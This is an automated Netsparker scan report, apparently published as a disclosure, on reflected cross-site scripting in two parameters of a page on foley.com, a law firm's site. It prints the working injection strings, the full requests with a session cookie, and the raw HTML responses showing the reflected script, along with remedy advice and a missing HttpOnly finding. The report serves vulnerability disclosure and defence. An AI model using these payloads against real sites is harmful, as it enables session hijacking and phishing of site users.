Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting in foley.com

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.foley.com/services/industry_detail...
SCAN DATE
4/15/2011 4:31:33 PM
REPORT DATE
4/15/2011 4:39:51 PM
SCAN DURATION
00:03:22

Total Requests

Average Speed

req/sec.
9
identified
5
confirmed
0
critical
4
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
22 %
LOW
33 %
INFORMATION
44 %
Cross-site Scripting

Cross-site Scripting

2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /services/otherservice_detail.aspx

/services/otherservice_detail.aspx CONFIRMED

http://www.foley.com/services/otherservice_detail.aspx?serviceid=2&nsextt='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
serviceid GET 2
nsextt GET '"--></style></script><script>alert(0x0006E8)</script>

Request

GET /services/otherservice_detail.aspx?serviceid=2&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006E8)%3C/script%3E HTTP/1.1
Referer: http://www.foley.com/services/services.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Cookie: ASP.NET_SessionId=4attkau5xs2c1m55gdgxmq3w
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:57 GMT
x-geoloc: 01
x-client: 000425
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: WDPRODWS25
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19830



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - Arbitrage Rebate
</title>
<meta content="" name=description>
<meta content="" name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%26nsextt%3d'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006E8)%3c%2fscript%3e%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%5ensextt%3d'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006E8)%3c%2fscript%3e%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+Arbitrage+Rebate&url=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%26nsextt%3d'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006E8)%3c%2fscript%3e"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s86RelatedServices/HeadingImage625/2/arc.jpg" width="748" height="82" border="0" alt="Arbitrage Rebate"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent"><strong>We Make Your Compliance Task Easy<br /></strong>If you're responsible for arbitrage rebate compliance, you have a lot at stake. Failure to comply with the rebate rules risks the tax-exempt status of your bonds. Loss of tax exemption could result in damaged investor relations and expensive settlement payments to bondholders or the Internal Revenue Service (IRS).<p class="PropGenBodyCopy">So our first job is to enable your compliance. We review your account statements covering bond proceeds and prepare a fully documented rebate report explaining our determination. Our legal opinion assures you that the determination meets the arbitrage rebate rules. We also prepare any required filings with the IRS.<p class="PropGenBodyCopy">What if you have a rebate liability? We fully consider money-saving rebate strategies so you pay the smallest amount possible. Some choices may have consequences beyond rebate, and we will thoroughly review those consequences with you.<p class="PropGenBodyCopy">Our staff does everything it can to make the process easy for you. We speak in plain English, we focus on the details, and we're available when you need us. Our commitment to service speaks for itself, but we urge you to contact our clients for references.<p class="PropGenHeader"><strong>Put Our Experience to Work for You<br /></strong>Arbitrage Rebate Company is part of the nationwide <a id="linkTE" href="http://www.foley.com/services/practice_detail.aspx?practiceid=140">Public Finance Services Practice</a> of Foley. Our bond attorneys complete billions of dollars in municipal securities transactions each year, and our practice is one of the largest in the United States. We have provided arbitrage rebate services since federal tax law imposed the rebate requirement in 1985.<p class="PropGenBodyCopy">Arbitrage Rebate Company maintains a full-time professional accounting staff to work on your arbitrage rebate matters. Each staff member has an extensive background in arbitrage rebate, gained from years of hands-on experience as well as broader training and qualifications in accounting.<p class="PropGenBodyCopy">In addition to our professional accounting staff, Arbitrage Rebate Company includes other essential practitioners — attorneys experienced in tax and bond law. Our attorneys identify ways to reduce rebate liability and ultimately are responsible for assuring that our determinations comply with the arbitrage rebate regulations.<br><br><a href="http://www.foley.com/services/otherservice_detail.aspx?serviceid=2&nsextt='"--></style></script><script>netsparker(0x0006E8)</script>&fulldesc=1"><img src="/img/b_more.gif" border=0></a><br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"><div class=margin><img vspace=6 src="/img/title/highlights.gif" width=185 height=25 border=0 alt="Highlights"><br><table border=0 cellpadding=0 cellspacing=0 width=90%><tr valign=top><td class=body><script language ="javascript">
if ( !blnHasFlash )
{

}
else
{
var flashstring = '';

flashstring = flashstring + '<OBJECT codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" height="107" width="178" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>';
flashstring = flashstring + '<PARAM NAME="Movie" VALUE="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf">';
flashstring = flashstring + '<PARAM NAME="Src" VALUE="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf">';
flashstring = flashstring + '<PARAM NAME="WMode" VALUE="Transparent">';
flashstring = flashstring + '<PARAM NAME="Quality" VALUE="High">';
flashstring = flashstring + '<PARAM NAME="SAlign" VALUE="">';
flashstring = flashstring + '<PARAM NAME="Menu" VALUE="-1">';
flashstring = flashstring + '<PARAM NAME="Base" VALUE="">';
flashstring = flashstring + '<PARAM NAME="AllowScriptAccess" VALUE="always">';
flashstring = flashstring + '<PARAM NAME="Scale" VALUE="ShowAll">';
flashstring = flashstring + '<PARAM NAME="DeviceFont" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="EmbedMovie" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="BGColor" VALUE="FFFFFF">';
flashstring = flashstring + '<PARAM NAME="SWRemote" VALUE="">';
flashstring = flashstring + '<param name="Width" value="178">';
flashstring = flashstring + '<param name="Height" value="107">';
flashstring = flashstring + '<EMBED src="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf" quality="high" wmode="transparent" bgcolor="#FFFFFF" WIDTH="178" HEIGHT="107" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></EMBED></OBJECT>';

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><br><br></td></tr></table></div></span>
<span id="lblRelatedContacts"></span>
<span id="lblRelatedNews"></span>
<span id="lblRelatedEvents"></span>
<span id="lblRelatedPubs"><div class=margin><img vspace=6 src="/img/title/publications.gif" width=185 height=25 border=0 alt="Publications"></div><table class="relatedinfo"><tr><td class=icon></td><td><a href="/publications/pub_results.aspx?serviceID=2"><img src="/img/b_relatedpubs.gif" alt="Related Publications" border=0></a><br></td></tr><tr><td class=icon></td><td><a href="javascript:popup('/publications/newsletter_signup.aspx?serviceID=2');"><img src="/img/b_signup.gif" width=112 height=13 border=0 alt="Newsletter Sign Up"></a><br></td></tr></table><br></div></span>




<span id="lblRelatedCaseStudies"></span>

<br>
<IMG alt="" src="/img/spacer.gif" width="185" height="25" border="0">
<!-- RIGHT-SIDE CONTENT END -->
<!-- FOOTER BEGIN -->

<br>
</td></tr></table> </td></tr>
<!---------END Middle Section----------->
<!---------Footer----------->
<tr valign="to..
- /services/otherservice_detail.aspx

/services/otherservice_detail.aspx CONFIRMED

http://www.foley.com/services/otherservice_detail.aspx?serviceid=2%00%27%22--%3E%3C%2Fstyle%3E%3C%2F..

Parameters

Parameter Type Value
serviceid GET 2'"--></style></script><script>alert(0x00072F)</script>

Request

GET /services/otherservice_detail.aspx?serviceid=2%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00072F)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.foley.com/services/services.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Cookie: ASP.NET_SessionId=4attkau5xs2c1m55gdgxmq3w
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:32:23 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19796



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - Arbitrage Rebate
</title>
<meta content="" name=description>
<meta content="" name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%00'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00072F)%3c%2fscript%3e%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%00'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00072F)%3c%2fscript%3e%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+Arbitrage+Rebate&url=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d2%00'%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00072F)%3c%2fscript%3e"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s86RelatedServices/HeadingImage625/2/arc.jpg" width="748" height="82" border="0" alt="Arbitrage Rebate"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent"><strong>We Make Your Compliance Task Easy<br /></strong>If you're responsible for arbitrage rebate compliance, you have a lot at stake. Failure to comply with the rebate rules risks the tax-exempt status of your bonds. Loss of tax exemption could result in damaged investor relations and expensive settlement payments to bondholders or the Internal Revenue Service (IRS).<p class="PropGenBodyCopy">So our first job is to enable your compliance. We review your account statements covering bond proceeds and prepare a fully documented rebate report explaining our determination. Our legal opinion assures you that the determination meets the arbitrage rebate rules. We also prepare any required filings with the IRS.<p class="PropGenBodyCopy">What if you have a rebate liability? We fully consider money-saving rebate strategies so you pay the smallest amount possible. Some choices may have consequences beyond rebate, and we will thoroughly review those consequences with you.<p class="PropGenBodyCopy">Our staff does everything it can to make the process easy for you. We speak in plain English, we focus on the details, and we're available when you need us. Our commitment to service speaks for itself, but we urge you to contact our clients for references.<p class="PropGenHeader"><strong>Put Our Experience to Work for You<br /></strong>Arbitrage Rebate Company is part of the nationwide <a id="linkTE" href="http://www.foley.com/services/practice_detail.aspx?practiceid=140">Public Finance Services Practice</a> of Foley. Our bond attorneys complete billions of dollars in municipal securities transactions each year, and our practice is one of the largest in the United States. We have provided arbitrage rebate services since federal tax law imposed the rebate requirement in 1985.<p class="PropGenBodyCopy">Arbitrage Rebate Company maintains a full-time professional accounting staff to work on your arbitrage rebate matters. Each staff member has an extensive background in arbitrage rebate, gained from years of hands-on experience as well as broader training and qualifications in accounting.<p class="PropGenBodyCopy">In addition to our professional accounting staff, Arbitrage Rebate Company includes other essential practitioners — attorneys experienced in tax and bond law. Our attorneys identify ways to reduce rebate liability and ultimately are responsible for assuring that our determinations comply with the arbitrage rebate regulations.<br><br><a href="http://www.foley.com/services/otherservice_detail.aspx?serviceid=2'"--></style></script><script>netsparker(0x00072F)</script>&fulldesc=1"><img src="/img/b_more.gif" border=0></a><br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"><div class=margin><img vspace=6 src="/img/title/highlights.gif" width=185 height=25 border=0 alt="Highlights"><br><table border=0 cellpadding=0 cellspacing=0 width=90%><tr valign=top><td class=body><script language ="javascript">
if ( !blnHasFlash )
{

}
else
{
var flashstring = '';

flashstring = flashstring + '<OBJECT codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" height="107" width="178" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>';
flashstring = flashstring + '<PARAM NAME="Movie" VALUE="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf">';
flashstring = flashstring + '<PARAM NAME="Src" VALUE="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf">';
flashstring = flashstring + '<PARAM NAME="WMode" VALUE="Transparent">';
flashstring = flashstring + '<PARAM NAME="Quality" VALUE="High">';
flashstring = flashstring + '<PARAM NAME="SAlign" VALUE="">';
flashstring = flashstring + '<PARAM NAME="Menu" VALUE="-1">';
flashstring = flashstring + '<PARAM NAME="Base" VALUE="">';
flashstring = flashstring + '<PARAM NAME="AllowScriptAccess" VALUE="always">';
flashstring = flashstring + '<PARAM NAME="Scale" VALUE="ShowAll">';
flashstring = flashstring + '<PARAM NAME="DeviceFont" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="EmbedMovie" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="BGColor" VALUE="FFFFFF">';
flashstring = flashstring + '<PARAM NAME="SWRemote" VALUE="">';
flashstring = flashstring + '<param name="Width" value="178">';
flashstring = flashstring + '<param name="Height" value="107">';
flashstring = flashstring + '<EMBED src="/files/tbl_s84Highlights/FileUpload562/284/09.5552-IndTeamHiliteBanner.swf" quality="high" wmode="transparent" bgcolor="#FFFFFF" WIDTH="178" HEIGHT="107" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></EMBED></OBJECT>';

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><br><br></td></tr></table></div></span>
<span id="lblRelatedContacts"></span>
<span id="lblRelatedNews"></span>
<span id="lblRelatedEvents"></span>
<span id="lblRelatedPubs"><div class=margin><img vspace=6 src="/img/title/publications.gif" width=185 height=25 border=0 alt="Publications"></div><table class="relatedinfo"><tr><td class=icon></td><td><a href="/publications/pub_results.aspx?serviceID=2"><img src="/img/b_relatedpubs.gif" alt="Related Publications" border=0></a><br></td></tr><tr><td class=icon></td><td><a href="javascript:popup('/publications/newsletter_signup.aspx?serviceID=2');"><img src="/img/b_signup.gif" width=112 height=13 border=0 alt="Newsletter Sign Up"></a><br></td></tr></table><br></div></span>




<span id="lblRelatedCaseStudies"></span>

<br>
<IMG alt="" src="/img/spacer.gif" width="185" height="25" border="0">
<!-- RIGHT-SIDE CONTENT END -->
<!-- FOOTER BEGIN -->

<br>
</td></tr></table> </td></tr>
<!---------END Middle Section----------->
<!---------Footer----------->
<tr valign="top">
<td bgcolor="#ffffff" colspan="3">
<table border="0" cellpadding=&qu..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

